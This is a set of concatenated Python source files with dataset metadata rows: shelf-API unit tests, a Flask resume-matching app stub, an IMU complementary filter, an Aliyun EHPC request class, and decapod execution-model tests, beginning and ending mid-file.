shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='NYC', capacity=10, friendly_name='GnG', latitude=40.6892534, longitude=-74.0466891, altitude=1.0) shelf1 = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='MTV', capacity=20) shelf2 = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='SAO', capacity=10) self.disabled_shelf = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='SVL', capacity=10, friendly_name='Bay') self.disabled_shelf.disable(loanertest.USER_EMAIL) self.shelf_locations = [ self.shelf.location, shelf1.location, shelf2.location, self.disabled_shelf.location] self.device1_key = device_model.Device( serial_number='12345', enrolled=True, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_1', damaged=False, ).put() self.device2_key = device_model.Device( serial_number='54321', enrolled=True, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_2', damaged=False, ).put() self.device3_key = device_model.Device( serial_number='67890', enrolled=True, shelf=self.shelf.key, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_3', damaged=False, ).put() self.device4_key = device_model.Device( serial_number='ABC123', enrolled=True, shelf=self.shelf.key, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_4', damaged=False, ).put() self.device_identifiers = [ self.device1_key.get().serial_number, self.device2_key.get().serial_number, self.device3_key.get().serial_number] def tearDown(self): super(ShelfApiTest, self).tearDown() self.service = None 
@mock.patch('__main__.root_api.Service.check_xsrf_token') @mock.patch('__main__.shelf_model.Shelf.enroll') def test_enroll(self, mock_enroll, mock_xsrf_token): """Test Enroll with mock methods.""" request = shelf_messages.EnrollShelfRequest( location='nyc', capacity=100, friendly_name='test', latitude=12.5, longitude=12.5, altitude=2.0, responsible_for_audit='precise', audit_interval_override=33, audit_notification_enabled=True) response = self.service.enroll(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertIsInstance(response, message_types.VoidMessage) def test_enroll_bad_request(self): request = shelf_messages.EnrollShelfRequest(capacity=10) with self.assertRaisesRegexp( shelf_api.endpoints.BadRequestException, 'Entity has uninitialized properties'): self.service.enroll(request) request = shelf_messages.EnrollShelfRequest( location='nyc', capacity=10, latitude=12.5) with self.assertRaisesRegexp( shelf_api.endpoints.BadRequestException, shelf_model._LAT_LONG_MSG): self.service.enroll(request) @mock.patch('__main__.root_api.Service.check_xsrf_token') def test_get_by_location(self, mock_xsrf_token): request = shelf_messages.ShelfRequest(location='NYC') response = self.service.get(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertEqual(self.shelf.location, response.location) self.assertEqual(self.shelf.friendly_name, response.friendly_name) def test_disable_by_location(self): request = shelf_messages.ShelfRequest(location='NYC') self.assertTrue(self.shelf.enabled) response = self.service.disable(request) self.assertFalse(self.shelf.enabled) self.assertIsInstance(response, message_types.VoidMessage) @mock.patch('__main__.root_api.Service.check_xsrf_token') def test_update_using_location(self, mock_xsrf_token): request = shelf_messages.UpdateShelfRequest( shelf_request=shelf_messages.ShelfRequest(location='NYC'), location='NYC-9th') response = self.service.update(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertEqual(self.shelf.location, 'NYC-9th') shelf = shelf_model.Shelf.get(friendly_name='GnG') self.assertEqual(shelf.location, 'NYC-9th') self.assertIsInstance(response, message_types.VoidMessage) @parameterized.parameters( (shelf_messages.Shelf(capacity=10), 2,), (shelf_messages.Shelf(enabled=False), 1,), (shelf_messages.Shelf( query=shared_messages.SearchRequest( query_string='enabled:True capacity:10')), 2,), (shelf_messages.Shelf( query=shared_messages.SearchRequest( query_string='enabled:False')), 1,)) @mock.patch('__main__.root_api.Service.check_xsrf_token') def test_list_shelves(self, request, response_length, mock_xsrf_token): response = self.service.list_shelves(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertEqual(response_length, len(response.shelves)) def test_list_shelves_invalid_page_size(self): with self.assertRaises(endpoints.BadRequestException): request = shelf_messages.Shelf(page_size=0) self.service.list_shelves(request) def test_list_shelves_with_search_constraints(self): expressions = shared_messages.SearchExpression(expression='location') expected_response = shelf_messages.ListShelfResponse( shelves=[shelf_messages.Shelf( location=self.shelf.location, shelf_request=shelf_messages.ShelfRequest( location=self.shelf.location, urlsafe_key=self.shelf.key.urlsafe()))], total_results=1, total_pages=1) request = shelf_messages.Shelf( query=shared_messages.SearchRequest( query_string='location:NYC', expressions=[expressions], returned_fields=['location'])) response = self.service.list_shelves(request) 
self.assertEqual(response, expected_response) def test_list_shelves_with_offset(self): previouse_shelf_locations = [] request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=1) response = self.service.list_shelves(request) self.assertEqual(len(response.shelves), 1) previouse_shelf_locations.append(response.shelves[0].location) # Get next page results and make sure it's not the same as last. request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=2) response = self.service.list_shelves(request) self.assertEqual(len(response.shelves), 1) self.assertNotIn(response.shelves[0], previouse_shelf_locations) previouse_shelf_locations.append(response.shelves[0].location) # Get next page results and make sure it's not the same as last 2. request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=3) response = self.service.list_shelves(request) self.assertEqual(len(response.shelves), 1) self.assertNotIn(response.shelves[0], previouse_shelf_locations) previouse_shelf_locations.append(response.shelves[0].location) @mock.patch('__main__.root_api.Service.check_xsrf_token') @mock.patch('__main__.shelf_api.logging.info') def test_audit_using_shelf_location(self, mock_logging, mock_xsrf_token): request = shelf_messages.ShelfAuditRequest( shelf_request=shelf_messages.ShelfRequest(location='NYC'), device_identifiers=self.device_identifiers) response = self.service.audit(request) self.assertEqual(mock_xsrf_token.call_count, 1) mock_logging.assert_called() for identifier in self.device_identifiers: datastore_device = device_model.Device.get(serial_number=identifier) self.assertEqual(datastore_device.shelf.get().location, 'NYC') self.assertFalse(self.shelf.audit_requested) self.assertEqual(self.shelf.last_audit_by, loanertest.SUPER_ADMIN_EMAIL) self.assertIsInstance(response, message_types.VoidMessage) def test_audit_invalid_device(self): request = shelf_messages.ShelfAuditRequest( shelf_request=shelf_messages.ShelfRequest(location='NYC'), device_identifiers=['Invalid']) with self.assertRaisesRegexp( endpoints.NotFoundException, shelf_api._DEVICE_DOES_NOT_EXIST_MSG % 'Invalid'): self.service.audit(request) @mock.patch.object(device_model.Device, 'search') @mock.patch.object(shelf_api, 'get_shelf', autospec=True) def test_audit_remove_devices( self, mock_get_shelf, mock_model_device_search): shelf = self.device2_key.get() shelf.shelf = self.shelf.key shelf.put() mock_model_device_search.return_value = ( search.SearchResults( results=[ search.ScoredDocument( doc_id=self.device2_key.urlsafe()), search.ScoredDocument( doc_id=self.device3_key.urlsafe()), search.ScoredDocument( doc_id=self.device4_key.urlsafe())], number_found=3)) mock_get_shelf.return_value = self.shelf request = shelf_messages.ShelfAuditRequest( shelf_request=shelf_messages.ShelfRequest(location=self.shelf.location), device_identifiers=[self.device3_key.get().serial_number]) self.service.audit(request) self.assertEqual(self.device3_key.get().shelf, self.shelf.key) self.assertIsNone(self.device2_key.get().shelf) self.assertIsNone(self.device4_key.get().shelf) def test_get_shelf_urlsafe_key(self): """Test getting a shelf using the urlsafe key.""" request = shelf_messages.ShelfRequest(urlsafe_key=self.shelf.key.urlsafe()) shelf = shelf_api.get_shelf(request) self.assertEqual(shelf, self.shelf) def test_get_shelf_using_location(self): """Test getting a shelf using the location.""" request = shelf_messages.ShelfRequest(location=self.shelf.location) shelf = shelf_api.get_shelf(request) self.assertEqual(shelf, 
self.shelf) def test_get_shelf_using_location_error(self): """Test getting a shelf with an invalid location.""" request = shelf_messages.ShelfRequest(location='Not_Valid') with self.assertRaisesRegexp( endpoints.NotFoundException, shelf_api._SHELF_DOES_NOT_EXIST_MSG % request.location): shelf_api.get_shelf(request) if __name__ == '__main__': loanertest.main()
41.905085
86
0.729494
10,963
0.886831
0
0
4,270
0.345413
0
0
1,883
0.152322
beb9ee31926225eb2b3cd87871300007116d1d11
2,177
py
Python
app/views/main.py
ArmandDS/ai_bert_resumes
743f37049bbca67bcbbaf21a2ffecf0d093351df
[ "MIT" ]
1
2020-02-28T12:17:38.000Z
2020-02-28T12:17:38.000Z
app/views/main.py
ArmandDS/ai_bert_resumes
743f37049bbca67bcbbaf21a2ffecf0d093351df
[ "MIT" ]
1
2021-06-02T00:54:48.000Z
2021-06-02T00:54:48.000Z
app/views/main.py
ArmandDS/ai_bert_resumes
743f37049bbca67bcbbaf21a2ffecf0d093351df
[ "MIT" ]
null
null
null
from flask import render_template, jsonify, Flask, redirect, url_for, request
from app import app
import random
import os
# import tensorflow as tf
# import numpy as np
# import sys
# import spacy

# nlp = spacy.load('en')
# sys.path.insert(0, "/content/bert_experimental")

# from bert_experimental.finetuning.text_preprocessing import build_preprocessor
# from bert_experimental.finetuning.graph_ops import load_graph

# restored_graph = load_graph("models/frozen_graph.pb")
# graph_ops = restored_graph.get_operations()
# input_op, output_op = graph_ops[0].name, graph_ops[-1].name
# x = restored_graph.get_tensor_by_name(input_op + ':0')
# y = restored_graph.get_tensor_by_name(output_op + ':0')
# preprocessor = build_preprocessor("./uncased_L-12_H-768_A-12/vocab.txt", 256)
# py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32], name='preprocessor')
# py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32])

# sess = tf.Session(graph=restored_graph)

# delimiter = " ||| "


@app.route('/')
def index1():
    return render_template('index.html', title='Home')


@app.route('/predict', methods = ['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        exp_st = request.form.get('exp')
        job_st = request.form.get('job')
        # y_out = sess.run(y, feed_dict={
        #     x: pd.DataFrame([delimiter.join((exp_st, job_st ))], columns=['name'])
        # })
        # doc1 = nlp(exp_st)
        # doc2 = nlp(job_st )
        # y_out2 = doc1.similarity(doc2)
        return render_template('index.html', title='Success', predictions=80, predictions_sp =75, exp=exp_st, job= job_st)


@app.route('/index')
def index():
    return render_template('index.html', title='Home')


@app.route('/map')
def map():
    return render_template('map.html', title='Map')


@app.route('/map/refresh', methods=['POST'])
def map_refresh():
    points = [(random.uniform(48.8434100, 48.8634100),
               random.uniform(2.3388000, 2.3588000))
              for _ in range(random.randint(2, 9))]
    return jsonify({'points': points})


@app.route('/contact')
def contact():
    return render_template('contact.html', title='Contact')
33.492308
117
0.686266
0
0
0
0
1,134
0.5209
0
0
1,255
0.576481
bebb042aa5530a31d011f0dddb5b720502bac701
11,710
py
Python
ahrs/filters/complementary.py
jaluebbe/ahrs
4b4a33b1006e0d455a71ac8379a2697202361758
[ "MIT" ]
null
null
null
ahrs/filters/complementary.py
jaluebbe/ahrs
4b4a33b1006e0d455a71ac8379a2697202361758
[ "MIT" ]
null
null
null
ahrs/filters/complementary.py
jaluebbe/ahrs
4b4a33b1006e0d455a71ac8379a2697202361758
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Complementary Filter ==================== Attitude quaternion obtained with gyroscope and accelerometer-magnetometer measurements, via complementary filter. First, the current orientation is estimated at time :math:`t`, from a previous orientation at time :math:`t-1`, and a given angular velocity, :math:`\\omega`, in rad/s. This orientation is computed by numerically integrating the angular velocity and adding it to the previous orientation, which is known as an **attitude propagation**. .. math:: \\begin{array}{rcl} \\mathbf{q}_\\omega &=& \\Big(\\mathbf{I}_4 + \\frac{\\Delta t}{2}\\boldsymbol\\Omega_t\\Big)\\mathbf{q}_{t-1} \\\\ &=& \\begin{bmatrix} 1 & -\\frac{\\Delta t}{2}\\omega_x & -\\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z \\\\ \\frac{\\Delta t}{2}\\omega_x & 1 & \\frac{\\Delta t}{2}\\omega_z & -\\frac{\\Delta t}{2}\\omega_y \\\\ \\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z & 1 & \\frac{\\Delta t}{2}\\omega_x \\\\ \\frac{\\Delta t}{2}\\omega_z & \\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_x & 1 \\end{bmatrix} \\begin{bmatrix}q_w \\\\ q_x \\\\ q_y \\\\ q_z \\end{bmatrix} \\\\ &=& \\begin{bmatrix} q_w - \\frac{\\Delta t}{2} \\omega_x q_x - \\frac{\\Delta t}{2} \\omega_y q_y - \\frac{\\Delta t}{2} \\omega_z q_z\\\\ q_x + \\frac{\\Delta t}{2} \\omega_x q_w - \\frac{\\Delta t}{2} \\omega_y q_z + \\frac{\\Delta t}{2} \\omega_z q_y\\\\ q_y + \\frac{\\Delta t}{2} \\omega_x q_z + \\frac{\\Delta t}{2} \\omega_y q_w - \\frac{\\Delta t}{2} \\omega_z q_x\\\\ q_z - \\frac{\\Delta t}{2} \\omega_x q_y + \\frac{\\Delta t}{2} \\omega_y q_x + \\frac{\\Delta t}{2} \\omega_z q_w \\end{bmatrix} \\end{array} Secondly, the *tilt* is computed from the accelerometer measurements as: .. math:: \\begin{array}{rcl} \\theta &=& \\mathrm{arctan2}(a_y, a_z) \\\\ \\phi &=& \\mathrm{arctan2}\\big(-a_x, \\sqrt{a_y^2+a_z^2}\\big) \\end{array} Only the pitch, :math:`\\phi`, and roll, :math:`\\theta`, angles are computed, leaving the yaw angle, :math:`\\psi` equal to zero. If a magnetometer sample is available, the yaw angle can be computed. First compensate the measurement using the *tilt*: .. math:: \\begin{array}{rcl} \\mathbf{b} &=& \\begin{bmatrix} \\cos\\theta & \\sin\\theta\\sin\\phi & \\sin\\theta\\cos\\phi \\\\ 0 & \\cos\\phi & -\\sin\\phi \\\\ -\\sin\\theta & \\cos\\theta\\sin\\phi & \\cos\\theta\\cos\\phi \\end{bmatrix} \\begin{bmatrix}m_x \\\\ m_y \\\\ m_z\\end{bmatrix} \\\\ \\begin{bmatrix}b_x \\\\ b_y \\\\ b_z\\end{bmatrix} &=& \\begin{bmatrix} m_x\\cos\\theta + m_y\\sin\\theta\\sin\\phi + m_z\\sin\\theta\\cos\\phi \\\\ m_y\\cos\\phi - m_z\\sin\\phi \\\\ -m_x\\sin\\theta + m_y\\cos\\theta\\sin\\phi + m_z\\cos\\theta\\cos\\phi \\end{bmatrix} \\end{array} Then, the yaw angle, :math:`\\psi`, is obtained as: .. math:: \\begin{array}{rcl} \\psi &=& \\mathrm{arctan2}(-b_y, b_x) \\\\ &=& \\mathrm{arctan2}\\big(m_z\\sin\\phi - m_y\\cos\\phi, \\; m_x\\cos\\theta + \\sin\\theta(m_y\\sin\\phi + m_z\\cos\\phi)\\big) \\end{array} We transform the roll-pitch-yaw angles to a quaternion representation: .. 
math:: \\mathbf{q}_{am} = \\begin{pmatrix}q_w\\\\q_x\\\\q_y\\\\q_z\\end{pmatrix} = \\begin{pmatrix} \\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\ \\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) - \\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\ \\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\ \\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) - \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) \\end{pmatrix} Finally, after each orientation is estimated independently, they are fused with the complementary filter. .. math:: \\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am} where :math:`\\mathbf{q}_\\omega` is the attitude estimated from the gyroscope, :math:`\\mathbf{q}_{am}` is the attitude estimated from the accelerometer and the magnetometer, and :math:`\\alpha` is the gain of the filter. The filter gain must be a floating value within the range :math:`[0.0, 1.0]`. It can be seen that when :math:`\\alpha=1`, the attitude is estimated entirely with the accelerometer and the magnetometer. When :math:`\\alpha=0`, it is estimated solely with the gyroscope. The values within the range decide how much of each estimation is "blended" into the quaternion. This is actually a simple implementation of `LERP <https://en.wikipedia.org/wiki/Linear_interpolation>`_ commonly used to linearly interpolate quaternions with small differences between them. """ import numpy as np from ..common.orientation import ecompass class Complementary: """ Complementary filter for attitude estimation as quaternion. Parameters ---------- gyr : numpy.ndarray, default: None N-by-3 array with measurements of angular velocity, in rad/s. acc : numpy.ndarray, default: None N-by-3 array with measurements of acceleration, in m/s^2. mag : numpy.ndarray, default: None N-by-3 array with measurements of magnetic field, in mT. frequency : float, default: 100.0 Sampling frequency in Herz. Dt : float, default: 0.01 Sampling step in seconds. Inverse of sampling frequency. Not required if ``frequency`` value is given. gain : float, default: 0.1 Filter gain. q0 : numpy.ndarray, default: None Initial orientation, as a versor (normalized quaternion). Raises ------ ValueError When dimension of input arrays ``acc``, ``gyr``, or ``mag`` are not equal. """ def __init__(self, gyr: np.ndarray = None, acc: np.ndarray = None, mag: np.ndarray = None, frequency: float = 100.0, gain = 0.9, **kwargs): self.gyr: np.ndarray = gyr self.acc: np.ndarray = acc self.mag: np.ndarray = mag self.frequency: float = frequency self.gain: float = gain if not(0.0 <= self.gain <= 1.0): raise ValueError(f"Filter gain must be in the range [0, 1]. Got {self.gain}") self.Dt: float = kwargs.get('Dt', 1.0/self.frequency) self.q0: np.ndarray = kwargs.get('q0') # Process of given data if self.gyr is not None and self.acc is not None: self.Q = self._compute_all() def _compute_all(self) -> np.ndarray: """ Estimate the quaternions given all data Attributes ``gyr``, ``acc`` and, optionally, ``mag`` must contain data. 
Returns ------- Q : numpy.ndarray M-by-4 Array with all estimated quaternions, where M is the number of samples. """ if self.acc.shape != self.gyr.shape: raise ValueError("acc and gyr are not the same size") num_samples = len(self.acc) Q = np.zeros((num_samples, 4)) if self.mag is None: self.mag = [None]*num_samples else: if self.mag.shape != self.gyr.shape: raise ValueError("mag and gyr are not the same size") Q[0] = self.am_estimation(self.acc[0], self.mag[0]) if self.q0 is None else self.q0.copy() for t in range(1, num_samples): Q[t] = self.update(Q[t-1], self.gyr[t], self.acc[t], self.mag[t]) return Q def attitude_propagation(self, q: np.ndarray, omega: np.ndarray, dt: float) -> np.ndarray: """ Attitude propagation of the orientation. Estimate the current orientation at time :math:`t`, from a given orientation at time :math:`t-1` and a given angular velocity, :math:`\\omega`, in rad/s. It is computed by numerically integrating the angular velocity and adding it to the previous orientation. Parameters ---------- q : numpy.ndarray A-priori quaternion. omega : numpy.ndarray Tri-axial angular velocity, in rad/s. dt : float Time step, in seconds, between consecutive Quaternions. Returns ------- q_omega : numpy.ndarray Estimated orientation, as quaternion. """ w = -0.5*dt*omega A = np.array([ [1.0, -w[0], -w[1], -w[2]], [w[0], 1.0, w[2], -w[1]], [w[1], -w[2], 1.0, w[0]], [w[2], w[1], -w[0], 1.0]]) q_omega = A @ q return q_omega / np.linalg.norm(q_omega) def am_estimation(self, acc: np.ndarray, mag: np.ndarray = None) -> np.ndarray: """ Attitude estimation from an Accelerometer-Magnetometer architecture. Parameters ---------- acc : numpy.ndarray Tri-axial sample of the accelerometer. mag : numpy.ndarray, default: None Tri-axial sample of the magnetometer. Returns ------- q_am : numpy.ndarray Estimated attitude. """ return ecompass(acc, mag, frame='NED', representation='quaternion') def update(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray = None, dt: float = None) -> np.ndarray: """ Attitude Estimation from given measurements and previous orientation. The new orientation is first estimated with the angular velocity, then another orientation is computed using the accelerometers and magnetometers. The magnetometer is optional. Each orientation is estimated independently and fused with a complementary filter. .. math:: \\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am} Parameters ---------- q : numpy.ndarray A-priori quaternion. gyr : numpy.ndarray Sample of tri-axial Gyroscope in rad/s. acc : numpy.ndarray Sample of tri-axial Accelerometer in m/s^2. mag : numpy.ndarray, default: None Sample of tri-axial Magnetometer in uT. dt : float, default: None Time step, in seconds, between consecutive Quaternions. Returns ------- q : numpy.ndarray Estimated quaternion. """ dt = self.Dt if dt is None else dt if gyr is None or not np.linalg.norm(gyr) > 0: return q q_omega = self.attitude_propagation(q, gyr, dt) q_am = self.am_estimation(acc, mag) # Complementary Estimation if np.linalg.norm(q_omega + q_am) < np.sqrt(2): q = (1.0 - self.gain)*q_omega - self.gain*q_am else: q = (1.0 - self.gain)*q_omega + self.gain*q_am return q/np.linalg.norm(q)
41.232394
219
0.566695
6,217
0.530914
0
0
0
0
0
0
9,159
0.782152
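The record above (ahrs/filters/complementary.py) documents the complementary-filter math and ships the implementation in the same file. A minimal usage sketch follows, assuming the class is importable from that module path; the sensor arrays are made up purely for illustration and are not part of the original record.

import numpy as np
from ahrs.filters.complementary import Complementary  # assumed import path, based on the record's repo path

# Hypothetical sensor logs: 100 samples each of gyroscope (rad/s), accelerometer (m/s^2), magnetometer (mT)
num_samples = 100
gyr = 0.01 * np.random.randn(num_samples, 3)        # small angular rates
acc = np.tile([0.0, 0.0, 9.81], (num_samples, 1))   # gravity along the body z-axis
mag = np.tile([16.0, 1.0, -34.0], (num_samples, 1)) # arbitrary magnetic field vector

# gain blends the gyro propagation (weight 1 - gain) with the accel/mag estimate (weight gain),
# matching q = (1 - alpha) * q_omega + alpha * q_am in the docstring above.
estimator = Complementary(gyr=gyr, acc=acc, mag=mag, frequency=100.0, gain=0.9)
print(estimator.Q.shape)  # (100, 4): one unit quaternion per sample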
bebb3991fe53855d056c3141b393c1defb50e7e5
4,197
py
Python
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py
yndu13/aliyun-openapi-python-sdk
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
[ "Apache-2.0" ]
1,001
2015-07-24T01:32:41.000Z
2022-03-25T01:28:18.000Z
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py
yndu13/aliyun-openapi-python-sdk
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
[ "Apache-2.0" ]
363
2015-10-20T03:15:00.000Z
2022-03-08T12:26:19.000Z
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py
yndu13/aliyun-openapi-python-sdk
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
[ "Apache-2.0" ]
682
2015-09-22T07:19:02.000Z
2022-03-22T09:51:46.000Z
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from aliyunsdkcore.request import RpcRequest from aliyunsdkehpc.endpoint import endpoint_data class EditJobTemplateRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'EHPC', '2018-04-12', 'EditJobTemplate') self.set_method('GET') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_StderrRedirectPath(self): return self.get_query_params().get('StderrRedirectPath') def set_StderrRedirectPath(self,StderrRedirectPath): self.add_query_param('StderrRedirectPath',StderrRedirectPath) def get_ClockTime(self): return self.get_query_params().get('ClockTime') def set_ClockTime(self,ClockTime): self.add_query_param('ClockTime',ClockTime) def get_CommandLine(self): return self.get_query_params().get('CommandLine') def set_CommandLine(self,CommandLine): self.add_query_param('CommandLine',CommandLine) def get_ArrayRequest(self): return self.get_query_params().get('ArrayRequest') def set_ArrayRequest(self,ArrayRequest): self.add_query_param('ArrayRequest',ArrayRequest) def get_PackagePath(self): return self.get_query_params().get('PackagePath') def set_PackagePath(self,PackagePath): self.add_query_param('PackagePath',PackagePath) def get_Mem(self): return self.get_query_params().get('Mem') def set_Mem(self,Mem): self.add_query_param('Mem',Mem) def get_StdoutRedirectPath(self): return self.get_query_params().get('StdoutRedirectPath') def set_StdoutRedirectPath(self,StdoutRedirectPath): self.add_query_param('StdoutRedirectPath',StdoutRedirectPath) def get_Variables(self): return self.get_query_params().get('Variables') def set_Variables(self,Variables): self.add_query_param('Variables',Variables) def get_RunasUser(self): return self.get_query_params().get('RunasUser') def set_RunasUser(self,RunasUser): self.add_query_param('RunasUser',RunasUser) def get_ReRunable(self): return self.get_query_params().get('ReRunable') def set_ReRunable(self,ReRunable): self.add_query_param('ReRunable',ReRunable) def get_Thread(self): return self.get_query_params().get('Thread') def set_Thread(self,Thread): self.add_query_param('Thread',Thread) def get_TemplateId(self): return self.get_query_params().get('TemplateId') def set_TemplateId(self,TemplateId): self.add_query_param('TemplateId',TemplateId) def get_Priority(self): return self.get_query_params().get('Priority') def set_Priority(self,Priority): self.add_query_param('Priority',Priority) def get_Gpu(self): return self.get_query_params().get('Gpu') def set_Gpu(self,Gpu): self.add_query_param('Gpu',Gpu) def get_Node(self): return self.get_query_params().get('Node') def set_Node(self,Node): self.add_query_param('Node',Node) def 
get_Task(self): return self.get_query_params().get('Task') def set_Task(self,Task): self.add_query_param('Task',Task) def get_Name(self): return self.get_query_params().get('Name') def set_Name(self,Name): self.add_query_param('Name',Name) def get_Queue(self): return self.get_query_params().get('Queue') def set_Queue(self,Queue): self.add_query_param('Queue',Queue)
29.978571
74
0.751013
3,310
0.788659
0
0
0
0
0
0
1,257
0.2995
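The EditJobTemplateRequest file above only builds the query parameters; dispatching it goes through the core SDK client. A minimal sketch follows, assuming the conventional aliyunsdkcore/aliyunsdkehpc module layout; the credentials, region, template ID and command line are placeholder values, not taken from the record.

# Dispatch sketch for the EditJobTemplateRequest shown above (placeholder values).
from aliyunsdkcore.client import AcsClient
from aliyunsdkehpc.request.v20180412.EditJobTemplateRequest import EditJobTemplateRequest

client = AcsClient("<access-key-id>", "<access-key-secret>", "cn-hangzhou")

request = EditJobTemplateRequest()
request.set_TemplateId("ehpc-job-tpl-xxxx")            # template to edit (placeholder)
request.set_Name("nightly-build")                      # new template name
request.set_CommandLine("mpirun ./solver input.dat")   # command the job will run

# do_action_with_exception sends the GET request built from the query params
# and raises on a non-2xx response; the body is returned as bytes.
response = client.do_action_with_exception(request)
print(response)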
bebb7eff935771339795abf6b86ab3ed10b32cc3
3,550
py
Python
tests/common/models/test_execution.py
angry-tony/ceph-lcm-decapod
535944d3ee384c3a7c4af82f74041b0a7792433f
[ "Apache-2.0" ]
41
2016-11-03T16:40:17.000Z
2019-05-23T08:39:17.000Z
tests/common/models/test_execution.py
Mirantis/ceph-lcm
fad9bad0b94f2ef608362953583b10a54a841d24
[ "Apache-2.0" ]
30
2016-10-14T10:54:46.000Z
2017-10-20T15:58:01.000Z
tests/common/models/test_execution.py
angry-tony/ceph-lcm-decapod
535944d3ee384c3a7c4af82f74041b0a7792433f
[ "Apache-2.0" ]
28
2016-09-17T01:17:36.000Z
2019-07-05T03:32:54.000Z
# -*- coding: utf-8 -*- # Copyright (c) 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for decapod_common.models.execution.""" import pytest from decapod_common.models import execution def test_create(new_execution, new_pcmodel, pymongo_connection): db_model = pymongo_connection.db.execution.find_one( {"_id": new_execution._id} ) assert db_model assert new_execution.model_id == db_model["model_id"] assert new_execution.version == db_model["version"] assert new_execution.time_created == db_model["time_created"] assert new_execution.time_deleted == db_model["time_deleted"] assert new_execution.initiator_id == db_model["initiator_id"] assert new_execution.playbook_configuration_model_id == \ db_model["pc_model_id"] assert new_execution.playbook_configuration_version == \ db_model["pc_version"] assert new_execution.state.name == db_model["state"] assert new_execution.state == execution.ExecutionState.created assert new_execution.playbook_configuration_model_id == \ new_pcmodel.model_id assert new_execution.playbook_configuration_version == \ new_pcmodel.version @pytest.mark.parametrize("state", execution.ExecutionState) def test_change_state_ok(state, new_execution): new_execution.state = state new_execution.save() assert new_execution.state == state @pytest.mark.parametrize("state", ( "", "changed", "started", 0, None, -1.0, [], {}, object(), set() )) def test_change_state_fail(state, new_execution): with pytest.raises(ValueError): new_execution.state = state @pytest.mark.parametrize("state", execution.ExecutionState) def test_api_response(state, new_pcmodel, new_execution): new_execution.state = state new_execution.save() assert new_execution.make_api_structure() == { "id": new_execution.model_id, "initiator_id": new_execution.initiator_id, "time_deleted": new_execution.time_deleted, "time_updated": new_execution.time_created, "model": execution.ExecutionModel.MODEL_NAME, "version": 2, "data": { "playbook_configuration": { "id": new_pcmodel.model_id, "version": new_pcmodel.version, "playbook_name": new_pcmodel.playbook_id }, "state": state.name } } def test_getting_logfile(new_execution, 